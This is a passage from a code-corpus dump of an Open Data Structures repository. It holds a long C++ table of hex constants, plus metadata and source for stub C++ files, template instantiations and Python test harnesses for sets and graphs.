9,\r\n\t0x392d7ee5,\r\n\t0x16fe493a,\r\n\t0xb6bcadfd,\r\n\t0x9813ec72,\r\n\t0x9aa3d37c,\r\n\t0xee88a59e,\r\n\t0x6cdbad4e,\r\n\t0x6b96aabf,\r\n\t0xcb54d5e5},\r\n\t{0x116fc403,\r\n\t0x260d7e7b,\r\n\t0xdef689e7,\r\n\t0xa5b3d49a,\r\n\t0x921f3594,\r\n\t0xb24c8cba,\r\n\t0x1bdefb3f,\r\n\t0x6519e846,\r\n\t0x24b37253,\r\n\t0x1cc6b12b,\r\n\t0x6f48f06e,\r\n\t0xca90b0db,\r\n\t0x8e20570b,\r\n\t0xda75ed0f,\r\n\t0x1b515143,\r\n\t0x0990a659,\r\n\t0xdcedb6b3,\r\n\t0xec22de79,\r\n\t0xdd56f7a9,\r\n\t0x901194a6,\r\n\t0x4bf3db02,\r\n\t0x5d31787d,\r\n\t0xd24da2ca,\r\n\t0x9fc9bc14,\r\n\t0x9aa38ac9,\r\n\t0xe95972ba,\r\n\t0x8233a732,\r\n\t0xb9d4317e,\r\n\t0x51f9b329,\r\n\t0x94f12c56,\r\n\t0x1ace26e4,\r\n\t0xecda5183,\r\n\t0x1353e547,\r\n\t0x39b99ab3,\r\n\t0x6413ac97,\r\n\t0xeb6b5334,\r\n\t0xdd94ed2b,\r\n\t0x298e9d2c,\r\n\t0xd38abc91,\r\n\t0x3f17ee4e,\r\n\t0x99f8931d,\r\n\t0x88bae7da,\r\n\t0xb5506a36,\r\n\t0x2d7baf6d,\r\n\t0x42a98d2b,\r\n\t0xbb9b94b9,\r\n\t0x58820083,\r\n\t0x521bba4c,\r\n\t0x76699597,\r\n\t0x137b86be,\r\n\t0x8533888e,\r\n\t0xb37316dd,\r\n\t0x284c3de4,\r\n\t0xfe60e3e6,\r\n\t0x94edaa40,\r\n\t0x919c85cd,\r\n\t0x24cb6f23,\r\n\t0x6b446fbd,\r\n\t0xbe933c15,\r\n\t0x2a43951a,\r\n\t0x791a9f90,\r\n\t0x47977c04,\r\n\t0xa6350eec,\r\n\t0x95e817a5,\r\n\t0xffc82e8c,\r\n\t0xad379229,\r\n\t0x6ec9531a,\r\n\t0x8cab29f9,\r\n\t0xb2f18402,\r\n\t0xd0ebdac1,\r\n\t0xd7b559b4,\r\n\t0x7ad30e7c,\r\n\t0xe1d1adb7,\r\n\t0x58a66f9c,\r\n\t0x7a26636a,\r\n\t0x8c865f92,\r\n\t0x65363517,\r\n\t0x732b87db,\r\n\t0x64a1ad52,\r\n\t0x72e87c39,\r\n\t0x0b943e4d,\r\n\t0x532d3593,\r\n\t0xedcf9975,\r\n\t0x44b5bec1,\r\n\t0x13ac91f8,\r\n\t0x6e6f3a76,\r\n\t0x36ac3c6d,\r\n\t0x528a3ecf,\r\n\t0xf3d8cd75,\r\n\t0x8facd64c,\r\n\t0xdb4d13d5,\r\n\t0x80d49a67,\r\n\t0xaa7061d3,\r\n\t0x9486ba8d,\r\n\t0x7454a65b,\r\n\t0x18e7b707,\r\n\t0xd9cc05b9,\r\n\t0x44eb014d,\r\n\t0x28ba26d8,\r\n\t0xa8852791,\r\n\t0xf8dc3053,\r\n\t0xabe46b52,\r\n\t0x9e261d1f,\r\n\t0x768f83dd,\r\n\t0x1c888838,\r\n\t0x6d9b9ce6,\r\n\t0x69e82575,\r\n\t0x2959538f,\r\n\t0xd0ff9685,\r\n\t0x92b4540c,\r\n\t0x7c93035b,\r\n\t0x7cad90ad,\r\n\t0x49aaa908,\r\n\t0x3981f4b8,\r\n\t0x191f4339,\r\n\t0xd0971bfc,\r\n\t0xa7209692,\r\n\t0x0e253cad,\r\n\t0x40e2ee61,\r\n\t0xc5c63486,\r\n\t0xdf4f238b,\r\n\t0x2d3cb89a,\r\n\t0x3b5704b2,\r\n\t0xcc14c2cb,\r\n\t0xb1698d38,\r\n\t0x079c3b9b,\r\n\t0xbb3867e4,\r\n\t0x9f01e223,\r\n\t0x35e69012,\r\n\t0x5c87d888,\r\n\t0x2cea4193,\r\n\t0xee088da5,\r\n\t0x0ea4d5ab,\r\n\t0x8a4906e8,\r\n\t0xf6e5e283,\r\n\t0xee87fa18,\r\n\t0x9f96c751,\r\n\t0x947252c0,\r\n\t0x9b50b97e,\r\n\t0x05952521,\r\n\t0x9440f5ae,\r\n\t0xa0642786,\r\n\t0xebcc62be,\r\n\t0xadccf011,\r\n\t0x00b863e6,\r\n\t0x1c3ab5b3,\r\n\t0x7c701e4b,\r\n\t0xa9565792,\r\n\t0xb1ad459c,\r\n\t0x833ba164,\r\n\t0x89
544ae3,\r\n\t0x35540c75,\r\n\t0x198d0fec,\r\n\t0xbe93bf33,\r\n\t0xc28444b3,\r\n\t0xbc3add48,\r\n\t0xb4300c14,\r\n\t0xee0ed408,\r\n\t0xca08ada3,\r\n\t0x0be06480,\r\n\t0xc4dd8ce2,\r\n\t0x61195564,\r\n\t0x5b10a111,\r\n\t0x65cd2b3b,\r\n\t0xcbeb06ae,\r\n\t0xfce70080,\r\n\t0xef40b102,\r\n\t0xfc0bfe6f,\r\n\t0x8111bf20,\r\n\t0xfb166db1,\r\n\t0x3598b2ef,\r\n\t0x1e0e04de,\r\n\t0x1bf7cf2d,\r\n\t0x0de7eaf1,\r\n\t0x829457e0,\r\n\t0xe8865341,\r\n\t0x826272ad,\r\n\t0xb57db2a4,\r\n\t0x7413e6e7,\r\n\t0x416323ff,\r\n\t0x8e08d503,\r\n\t0x1da4dfac,\r\n\t0x983b9a78,\r\n\t0x0fab5fe0,\r\n\t0x585e7a90,\r\n\t0x038cf73c,\r\n\t0xecf90d31,\r\n\t0x046055c8,\r\n\t0x59926d71,\r\n\t0x06959f1f,\r\n\t0x3b8290b7,\r\n\t0x0bb834d9,\r\n\t0xa0dc5bec,\r\n\t0xec9ae604,\r\n\t0x6ebfd59d,\r\n\t0xfeccbab5,\r\n\t0x240bd4ba,\r\n\t0x2df2b232,\r\n\t0xe14e0383,\r\n\t0xd86526ec,\r\n\t0xe3d974fc,\r\n\t0x940662b5,\r\n\t0x81abf5d4,\r\n\t0x8010e6eb,\r\n\t0x700d9849,\r\n\t0x040d0c42,\r\n\t0xc980417b,\r\n\t0x95fa374a,\r\n\t0x724b1448,\r\n\t0x217205ec,\r\n\t0x0153b4bb,\r\n\t0xea55ea92,\r\n\t0x2049d5a1,\r\n\t0x82576f06,\r\n\t0x586fcfeb,\r\n\t0xa975e489,\r\n\t0x14c862e9,\r\n\t0xacb8b52c,\r\n\t0x2f3fb91e,\r\n\t0xce273650,\r\n\t0x66608f4a,\r\n\t0x24f81bb7,\r\n\t0x0382dc34,\r\n\t0x07bdc163,\r\n\t0xc42ad034,\r\n\t0xe63cf998,\r\n\t0x1a61f233,\r\n\t0xd5754ebe,\r\n\t0x37275214,\r\n\t0x2322de2a,\r\n\t0x3a53b9b4,\r\n\t0xab9c6963,\r\n\t0x2f3a51be,\r\n\t0x5066e7c7,\r\n\t0x941bda97,\r\n\t0x75fadceb,\r\n\t0xd05ad081,\r\n\t0xf77d5daf,\r\n\t0xd9879250,\r\n\t0xebf8bf97,\r\n\t0x65be4a70,\r\n\t0x388eda48,\r\n\t0x728173fb,\r\n\t0x05975bfa,\r\n\t0x314dad8a,\r\n\t0x2cb4909f,\r\n\t0xc736b716,\r\n\t0x9007296d,\r\n\t0x4fd61551,\r\n\t0xd4378ccf,\r\n\t0x649aac3e,\r\n\t0xd9ca1a9d,\r\n\t0x16ff16ae,\r\n\t0x8090f1c5,\r\n\t0xfe0c4703,\r\n\t0xc4152307},\r\n\t{0xf07e5e34,\r\n\t0x62114ba6,\r\n\t0xf45ffe22,\r\n\t0xbaa48702,\r\n\t0xe27e48a4,\r\n\t0xc43b4779,\r\n\t0x549a4566,\r\n\t0x93bc4836,\r\n\t0x3b2e8d46,\r\n\t0x3f8a77ae,\r\n\t0x71e2d944,\r\n\t0xc09c5dce,\r\n\t0xebfbfd4f,\r\n\t0x7f8e1c40,\r\n\t0x3c310a69,\r\n\t0x52f62f09,\r\n\t0xb7fd11bb,\r\n\t0xa9d055a7,\r\n\t0xe3bd4654,\r\n\t0x9696ae10,\r\n\t0xdf953225,\r\n\t0x42fd2380,\r\n\t0x69756e5c,\r\n\t0x9d950bc4,\r\n\t0xe2beea59,\r\n\t0xd33daa07,\r\n\t0xe97d31ce,\r\n\t0xd9fb0a49,\r\n\t0x553a27f2,\r\n\t0x7166586f,\r\n\t0xeb04d48c,\r\n\t0x72adb63a,\r\n\t0x340ab99e,\r\n\t0x459b4609,\r\n\t0x481421b7,\r\n\t0x7db83c71,\r\n\t0x192f6c22,\r\n\t0x711852a8,\r\n\t0xc6bd6562,\r\n\t0xb91be2c8,\r\n\t0xefe89dbf,\r\n\t0xc404eb9b,\r\n\t0x9ebc1bc7,\r\n\t0x8dc7eed2,\r\n\t0x4d84efd7,\r\n\t0x0783d7e5,\r\n\t0x3b5ca2f2,\r\n\t0x9997e51c,\r\n\t0x89b432c9,\r\n\t0x72ae9672,\r\n\t0x61d522d9,\r\n\t0xa639fd45,\r\n\t0xa7da3b46,\r\n\t0x696e73ec,\r\n\t0x89581a95,\r\n\t0x4aa25f94,\r\n\t0xd0eb2a48,\r\n\t0x04865f68,\r\n\t0x1cbd651a,\r\n\t0xd6b2afd9,\r\n\t0xd401b965,\r\n\t0xd20aa5a7,\r\n\t0xc0aa1b15,\r\n\t0xfb4ce7af,\r\n\t0x159974c5,\r\n\t0x15d0841d,\r\n\t0x6b2836b4,\r\n\t0xef3b3edf,\r\n\t0xaf2db0b3,\r\n\t0x13106fb6,\r\n\t0xff41d7f9,\r\n\t0xab2a698d,\r\n\t0x68e04dc9,\r\n\t0xe5ee0099,\r\n\t0xe50d4017,\r\n\t0x5ea78d6d,\r\n\t0x2e18fb07,\r\n\t0xfe22b9ff,\r\n\t0x544c05f1,\r\n\t0xc2e10853,\r\n\t0x8d151bd6,\r\n\t0x17ee763a,\r\n\t0xa663ce31,\r\n\t0x4a4b5e33,\r\n\t0x298b13c1,\r\n\t0xd3b40c89,\r\n\t0x121b6b4e,\r\n\t0x59cf0429,\r\n\t0x3d0bab9d,\r\n\t0xd24c5dfe,\r\n\t0x5bb7349f,\r\n\t0xac5dbfe9,\r\n\t0x7eca5ebb,\r\n\t0xadb8b3e3,\r\n\t0x71ab540b,\r\n\t0xc8e3dc0d,\r\n\t0x12e6cd3f,\r\n\t0x8197f22c,\r\n\t0x5ff77265,\r\n\t0xe5641dbc,\r\n\t0x818ab24c,\r\n\t0x627b98f7,\r\n\t0xdd84e1d6,\r\n\t0x53
1c2346,\r\n\t0xec2f4e3c,\r\n\t0x4a3cb318,\r\n\t0x70cb24fe,\r\n\t0x35c17bfe,\r\n\t0xec91fd18,\r\n\t0x6efb3c18,\r\n\t0x16908369,\r\n\t0x41732188,\r\n\t0x449e658b,\r\n\t0x2e9931cb,\r\n\t0x67cd066e,\r\n\t0x883ca306,\r\n\t0xf66aecac,\r\n\t0x979bf015,\r\n\t0x8e85e27d,\r\n\t0x0560372b,\r\n\t0x987995d6,\r\n\t0xaff98ed7,\r\n\t0x552ee87b,\r\n\t0x21a53787,\r\n\t0x3d3cfd45,\r\n\t0xa084dae0,\r\n\t0x8c91be2f,\r\n\t0xac4c3550,\r\n\t0xa7db63ff,\r\n\t0x124b2f23,\r\n\t0x95d05d4e,\r\n\t0xb983db13,\r\n\t0xa929a3c1,\r\n\t0x111cd0a0,\r\n\t0xf59ded9a,\r\n\t0xce677ae3,\r\n\t0xfa949e59,\r\n\t0xd673e658,\r\n\t0xf8c8e27b,\r\n\t0x3c60fc3d,\r\n\t0x59a4f230,\r\n\t0xf54a5e87,\r\n\t0x08cff440,\r\n\t0xd4bbb1ee,\r\n\t0x6a0c7db0,\r\n\t0xecbaa99d,\r\n\t0xec61dcaf,\r\n\t0xf1056e2b,\r\n\t0x54236899,\r\n\t0xadad347c,\r\n\t0xc9885bc9,\r\n\t0x2fe2a4ec,\r\n\t0x01ba2b86,\r\n\t0x6b23f604,\r\n\t0xb354ef08,\r\n\t0x6a3dc5e2,\r\n\t0xab61da36,\r\n\t0x7543925a,\r\n\t0x0a558940,\r\n\t0x48d4d8f3,\r\n\t0xd84f2f6f,\r\n\t0x6ac5311c,\r\n\t0xcd1b660e,\r\n\t0x51293d3d,\r\n\t0xa0f15790,\r\n\t0xd629cd78,\r\n\t0x89201fa5,\r\n\t0x46005119,\r\n\t0x9617fa14,\r\n\t0xc375a68b,\r\n\t0x7ccb519b,\r\n\t0x6420a714,\r\n\t0xb736d2ce,\r\n\t0x154fcf4a,\r\n\t0x71cad2f5,\r\n\t0xacb150d7,\r\n\t0x97bc8e36,\r\n\t0xc5506d0a,\r\n\t0xa9facc35,\r\n\t0x1a9630db,\r\n\t0xbd3d72ee,\r\n\t0x58cdf27c,\r\n\t0x17f3e1f9,\r\n\t0x41598836,\r\n\t0xd6adac30,\r\n\t0x309a5b3f,\r\n\t0x3bd3aa32,\r\n\t0x40f08f50,\r\n\t0xf37cbd6c,\r\n\t0xcbdb8aef,\r\n\t0xe0819189,\r\n\t0x5a9b663b,\r\n\t0x6932a448,\r\n\t0xb1b3e866,\r\n\t0xc50ee24d,\r\n\t0xad999126,\r\n\t0xafb04056,\r\n\t0xc95974e5,\r\n\t0x636a64fa,\r\n\t0x0bb12dd9,\r\n\t0x78caa164,\r\n\t0xd26a7ec8,\r\n\t0x451a0b53,\r\n\t0x6d00aac6,\r\n\t0x484d1d9d,\r\n\t0x39728dd4,\r\n\t0xfbfec2ea,\r\n\t0xa6d5aaf9,\r\n\t0x91c4f6ea,\r\n\t0x31cab009,\r\n\t0x9b6ba4e8,\r\n\t0xe271ed67,\r\n\t0x4c87a84d,\r\n\t0x8a1a4567,\r\n\t0x93749497,\r\n\t0xc566edcc,\r\n\t0xc8229554,\r\n\t0x927925fd,\r\n\t0xad1caced,\r\n\t0xdc24f7ed,\r\n\t0xc92b9220,\r\n\t0x936cd037,\r\n\t0xbd2d0256,\r\n\t0x5c92409b,\r\n\t0xa3aa2682,\r\n\t0x4da97646,\r\n\t0xbcfdec81,\r\n\t0x25d5b61d,\r\n\t0x20e1660d,\r\n\t0x4b5214ed,\r\n\t0x91aa596a,\r\n\t0xb241415c,\r\n\t0x88ec91a1,\r\n\t0x2375e939,\r\n\t0x981ad627,\r\n\t0x4a54ee18,\r\n\t0x13d98660,\r\n\t0x9375c64d,\r\n\t0x538d3b28,\r\n\t0x4bf37ca7,\r\n\t0x192b351e,\r\n\t0x3cacf215,\r\n\t0x3ecf3565,\r\n\t0x50f5c0fc,\r\n\t0xaafe3d4e,\r\n\t0x6351b4f5,\r\n\t0x1b800d4f,\r\n\t0xfad73cdf,\r\n\t0xe300e1d8,\r\n\t0xb2cb5b04,\r\n\t0xfb019702,\r\n\t0xfb647f85,\r\n\t0x375a7b74,\r\n\t0xed6a6760,\r\n\t0x45c54e76,\r\n\t0x06524d79},\r\n\t{0x48722ec4,\r\n\t0x8a2694db,\r\n\t0x3cf80478,\r\n\t0xf9bc47ba,\r\n\t0x76b258fb,\r\n\t0xf71a1ec6,\r\n\t0x841189df,\r\n\t0x1a866461,\r\n\t0x72b5488c,\r\n\t0x71663983,\r\n\t0xbda59407,\r\n\t0xa2b68f85,\r\n\t0x62dbd0aa,\r\n\t0xe4966aa3,\r\n\t0x32e0efaa,\r\n\t0x71bb3699,\r\n\t0x2eda14a6,\r\n\t0x53f8917c,\r\n\t0x874974ce,\r\n\t0xe680bcca,\r\n\t0x96a9c462,\r\n\t0x399ca451,\r\n\t0xc46616f5,\r\n\t0xeee71114,\r\n\t0x5878e472,\r\n\t0x3a83c559,\r\n\t0x54862a18,\r\n\t0x82aea480,\r\n\t0x492d0019,\r\n\t0xd62a7027,\r\n\t0x36655f50,\r\n\t0xce412fdf,\r\n\t0xc8136871,\r\n\t0xd6cfe1d8,\r\n\t0x121c9c91,\r\n\t0x13abbf51,\r\n\t0x3aaa7037,\r\n\t0x9f6e7cb6,\r\n\t0xae82c4c4,\r\n\t0x55fdce32,\r\n\t0xd8dd6bda,\r\n\t0xd6ec4938,\r\n\t0x6a5aee52,\r\n\t0x52c8a764,\r\n\t0xa6a85297,\r\n\t0x5131de9e,\r\n\t0x396a6599,\r\n\t0xe27b1100,\r\n\t0xe68588d3,\r\n\t0x7b89a612,\r\n\t0xad48a7a4,\r\n\t0xfd205673,\r\n\t0x81807089,\r\n\t0x239d2d38,\r\n\t0x39518df3,\r\n\t0x256f3f14,\r\n\t0x5c
65e7b8,\r\n\t0x64caebdc,\r\n\t0xd8d694b6,\r\n\t0xb4a87da3,\r\n\t0xa651881e,\r\n\t0xca1d252d,\r\n\t0x993a3ddc,\r\n\t0x14f9a54d,\r\n\t0x6b14d2ff,\r\n\t0xbbed03bb,\r\n\t0x8d12bc03,\r\n\t0x6cce455d,\r\n\t0x613d6487,\r\n\t0x6d04ce6a,\r\n\t0xc2f4c84c,\r\n\t0x306d8ff2,\r\n\t0x584a9847,\r\n\t0x68902fc5,\r\n\t0x70af1a4f,\r\n\t0x3ab4cb98,\r\n\t0xe8be4453,\r\n\t0x7e95d355,\r\n\t0x84b0f371,\r\n\t0x4c5ccb52,\r\n\t0xdd6d029c,\r\n\t0xafa47124,\r\n\t0x71aabf91,\r\n\t0xd3407f95,\r\n\t0xe7fa3a9c,\r\n\t0x4f634405,\r\n\t0x0cbf2cb7,\r\n\t0x0192ff17,\r\n\t0x296959dd,\r\n\t0x9e4d34d5,\r\n\t0xfd9a4286,\r\n\t0xac7b6933,\r\n\t0x4650f585,\r\n\t0x168af40d,\r\n\t0x73816119,\r\n\t0x5542d96d,\r\n\t0x99047276,\r\n\t0x1b5bbe67,\r\n\t0x01a8209e,\r\n\t0x6f9db32e,\r\n\t0xd762bbd1,\r\n\t0x299a3804,\r\n\t0x87abe66d,\r\n\t0xd479eeaa,\r\n\t0x79928f4e,\r\n\t0x3937ffbc,\r\n\t0x3c8e83ca,\r\n\t0x2a8f9347,\r\n\t0x4d2324d3,\r\n\t0xf0183dda,\r\n\t0x9fbedb15,\r\n\t0xac365889,\r\n\t0xf1be552c,\r\n\t0xa4b32d5a,\r\n\t0xdc77fff3,\r\n\t0x9d516da8,\r\n\t0x7f3c347c,\r\n\t0x39e8479f,\r\n\t0x9e869687,\r\n\t0x6a160347,\r\n\t0x49ab7403,\r\n\t0x830d31c7,\r\n\t0x11311354,\r\n\t0x79e6cc69,\r\n\t0x35b25caa,\r\n\t0x398af9aa,\r\n\t0x02ef4356,\r\n\t0xb5ecba53,\r\n\t0x666d6c8b,\r\n\t0x8836b3ae,\r\n\t0x23b9fc98,\r\n\t0x0cc8e3d0,\r\n\t0x3ad594e1,\r\n\t0xb124529d,\r\n\t0xe059c1de,\r\n\t0xfa88e0d9,\r\n\t0xba117846,\r\n\t0x1782a65a,\r\n\t0xee9f80f9,\r\n\t0xbc9aec55,\r\n\t0x88aec1d4,\r\n\t0x9c3907fa,\r\n\t0x92b7b5bf,\r\n\t0x464acbf4,\r\n\t0xbbbd04a8,\r\n\t0xf0e966bf,\r\n\t0x14c5f971,\r\n\t0x83018d49,\r\n\t0xfaf4fc0a,\r\n\t0x3b4639b2,\r\n\t0x6b7e297d,\r\n\t0xc0e9a807,\r\n\t0x418713d3,\r\n\t0x1a2b2361,\r\n\t0x80850d90,\r\n\t0xd515816e,\r\n\t0x3deb48ea,\r\n\t0x6bfe6aa1,\r\n\t0x3680036c,\r\n\t0x228e76ae,\r\n\t0x78f16c87,\r\n\t0xff4d85ea,\r\n\t0x7d831974,\r\n\t0xba962d6b,\r\n\t0x4bae0b1d,\r\n\t0xc0db431a,\r\n\t0x04b46400,\r\n\t0xcf427175,\r\n\t0x244e321d,\r\n\t0x1c8b1fc9,\r\n\t0x63a2b794,\r\n\t0x1939d9c6,\r\n\t0xc92a530e,\r\n\t0x21a8e5ad,\r\n\t0x28050194,\r\n\t0x3b106223,\r\n\t0xb21e2ce1,\r\n\t0x7ae71fe4,\r\n\t0x7f7759f0,\r\n\t0x0329c8f4,\r\n\t0xd09f6b37,\r\n\t0x897e12a5,\r\n\t0x4103c4b1,\r\n\t0x56520dae,\r\n\t0x5d7391aa,\r\n\t0x7ac9f12d,\r\n\t0xeac6b834,\r\n\t0x99f8f6a8,\r\n\t0x2867867a,\r\n\t0xff6f3343,\r\n\t0x3167097a,\r\n\t0x38432d1d,\r\n\t0x108377f8,\r\n\t0xfd8e0d5f,\r\n\t0x25e15692,\r\n\t0xf00d40f9,\r\n\t0x1f1276f3,\r\n\t0xb748c8cd,\r\n\t0x6dbb9d9c,\r\n\t0x99ab7ceb,\r\n\t0xa4a9784f,\r\n\t0xcb4b2535,\r\n\t0xb3eb5ca7,\r\n\t0xd3a09e75,\r\n\t0x90f3ee7e,\r\n\t0x28ef2a57,\r\n\t0xbdb643a2,\r\n\t0x1112ab10,\r\n\t0x546b1af2,\r\n\t0x8c41e90d,\r\n\t0x0f5fcd88,\r\n\t0x6f259f40,\r\n\t0x34b33966,\r\n\t0x5f3558d7,\r\n\t0xfff36f0b,\r\n\t0xa3459449,\r\n\t0xdcecbce1,\r\n\t0x69ff2bf7,\r\n\t0x7525e1da,\r\n\t0x24c9de72,\r\n\t0xea9626b1,\r\n\t0x87c7385d,\r\n\t0x15e4211e,\r\n\t0x9f7ef269,\r\n\t0xfed018d1,\r\n\t0x7632076c,\r\n\t0x8d4f0157,\r\n\t0x10c1205a,\r\n\t0x65db0e00,\r\n\t0x813f0e8b,\r\n\t0xbafea255,\r\n\t0xb47e6663,\r\n\t0x2a0eba78,\r\n\t0xf66b3783,\r\n\t0xfff1db48,\r\n\t0x47997f03,\r\n\t0x3a49e877,\r\n\t0x4536a0b5,\r\n\t0x89b0738f,\r\n\t0xf5758b5e,\r\n\t0x1d277388,\r\n\t0xf5db28e8,\r\n\t0xb4ef0add,\r\n\t0x776fed12,\r\n\t0x045b614a,\r\n\t0xc95f47ae,\r\n\t0x13a1d602,\r\n\t0x217d6338,\r\n\t0xc509d080,\r\n\t0x006789de,\r\n\t0xd891cccc,\r\n\t0xb02f9980,\r\n\t0x67f00301,\r\n\t0xafc87999,\r\n\t0x043d8fbd,\r\n\t0xb32d6061}};\r\n\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5493826866149902,
"avg_line_length": 10.461538314819336,
"blob_id": "5aa9a6e74918651a221123a69f5c9a2508a0e40c",
"content_id": "23344d4bd050fe769310fb2c779693a94d8ed330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/ScapegoatTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * ScapegoatTree.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"ScapegoatTree.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 16.33333396911621,
"blob_id": "56434ea9e35f79dfddb51b0c79166bd512461f6b",
"content_id": "6e220cfb533dcaa0efaa84a6ceec0dac4f9962de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_adjacencylists.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\n\r\nimport ods\r\nfrom graphtest import exercise_graph\r\n\r\n\r\ndef test_al():\r\n exercise_graph(ods.AdjacencyLists)"
},
{
"alpha_fraction": 0.7168141603469849,
"alphanum_fraction": 0.7168141603469849,
"avg_line_length": 16.5,
"blob_id": "666ea1911a89635e3460790cf26f9ac7e70cb770",
"content_id": "14b41eed2482ba5a9ad01eb5c4ef47278b8481cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 113,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_adjacencymatrix.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\n\r\nimport ods\r\nfrom graphtest import exercise_graph\r\n\r\n\r\ndef test_am():\r\n exercise_graph(ods.AdjacencyMatrix)"
},
{
"alpha_fraction": 0.34309622645378113,
"alphanum_fraction": 0.3828451931476593,
"avg_line_length": 22.789474487304688,
"blob_id": "56053ef9e6149fc9fef5d05ed257cc44faf204be",
"content_id": "619131272f2673e95d60dbe19b566e66574c2aaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 956,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 38,
"path": "/opendatastructures.org/python/ods/tests/settest.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\nimport random\r\n\r\ndef set_cmp(s1, s2):\r\n \"\"\"Compare s1 and s2 several different ways\"\"\"\r\n assert(len(s1) == len(s2))\r\n assert(sorted(s1) == sorted(s2))\r\n for x in s1:\r\n assert(x in s2)\r\n for x in s2:\r\n assert(x in s1)\r\n \r\ndef exercise_set(s):\r\n s1 = s\r\n s2 = set()\r\n \r\n n = 100\r\n for j in range(5):\r\n if j == 2:\r\n s1.clear()\r\n s2.clear()\r\n for _ in range(n):\r\n x = random.randrange(2*n)\r\n s1.add(x)\r\n s2.add(x)\r\n set_cmp(s1, s2)\r\n \r\n for i in range(2*n):\r\n assert((i in s1) == (i in s2))\r\n \r\n for i in range(n):\r\n x = random.randrange(2*n)\r\n if x in s2:\r\n s1.remove(x)\r\n s2.remove(x)\r\n set_cmp(s1, s2)\r\n \r\n for i in range(2*n):\r\n assert((i in s1) == (i in s2))\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.5498154759407043,
"alphanum_fraction": 0.553505539894104,
"avg_line_length": 13.05555534362793,
"blob_id": "7fb55acb19b936232886e0b1a87aefbc85d7c680",
"content_id": "9ab9300a41ad4385b01d30ab2c7f62ff2de31e45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 18,
"path": "/opendatastructures.org/cpp/Simple.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/** Fake file used for providing a code snippet */\r\n\r\nnamespace ods {\r\n\r\ntemplate<class T>\r\nclass Simple {\r\n\tint *a;\r\n\tint n;\r\n\tvoid snippet();\r\n}\r\n\r\ntemplate<class T>\r\nvoid Simple<T>::snippet() {\r\n\tfor (int i = 0; i < n; i++) \r\n\t\ta[i] = i;\r\n}\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.713178277015686,
"alphanum_fraction": 0.713178277015686,
"avg_line_length": 19.5,
"blob_id": "e1704e6b6863b4471d538003de30ae1a6b15e3fa",
"content_id": "972012dcec8d32e4599b6b9443dd0309545213e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_xfasttrie.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "from nose.tools import *\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_bst():\r\n exercise_sset(ods.XFastTrie())\r\n"
},
{
"alpha_fraction": 0.4740259647369385,
"alphanum_fraction": 0.5259740352630615,
"avg_line_length": 9.84615421295166,
"blob_id": "4b3efcefa9576878f57349b5d6f022a8f135dfef",
"content_id": "c0f2d4445c724a9b46310b1c1430b9c759951ce0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/YFastTrie.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * YFastTrie.cpp\r\n *\r\n * Created on: 2012-01-27\r\n * Author: morin\r\n */\r\n\r\n#include \"YFastTrie.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.6717557311058044,
"alphanum_fraction": 0.6870229244232178,
"avg_line_length": 19.83333396911621,
"blob_id": "84c1990519459541cea32b66f86ae40ac54fc2bb",
"content_id": "8803ff1138decfbf8f50db9aec325497da93ac80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 524,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 24,
"path": "/opendatastructures.org/cpp/DualArrayDeque.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * DualArrayDeque.cpp\r\n *\r\n * Created on: 2011-11-23\r\n * Author: morin\r\n */\r\n\r\n#include \"DualArrayDeque.h\"\r\n#include \"utils.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\ntemplate DualArrayDeque<int>::DualArrayDeque();\r\ntemplate DualArrayDeque<int>::~DualArrayDeque();\r\ntemplate int DualArrayDeque<int>::get(int);\r\ntemplate int DualArrayDeque<int>::set(int,int);\r\ntemplate void DualArrayDeque<int>::add(int,int);\r\ntemplate int DualArrayDeque<int>::remove(int);\r\ntemplate int DualArrayDeque<int>::size();\r\n\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.6499999761581421,
"alphanum_fraction": 0.6727272868156433,
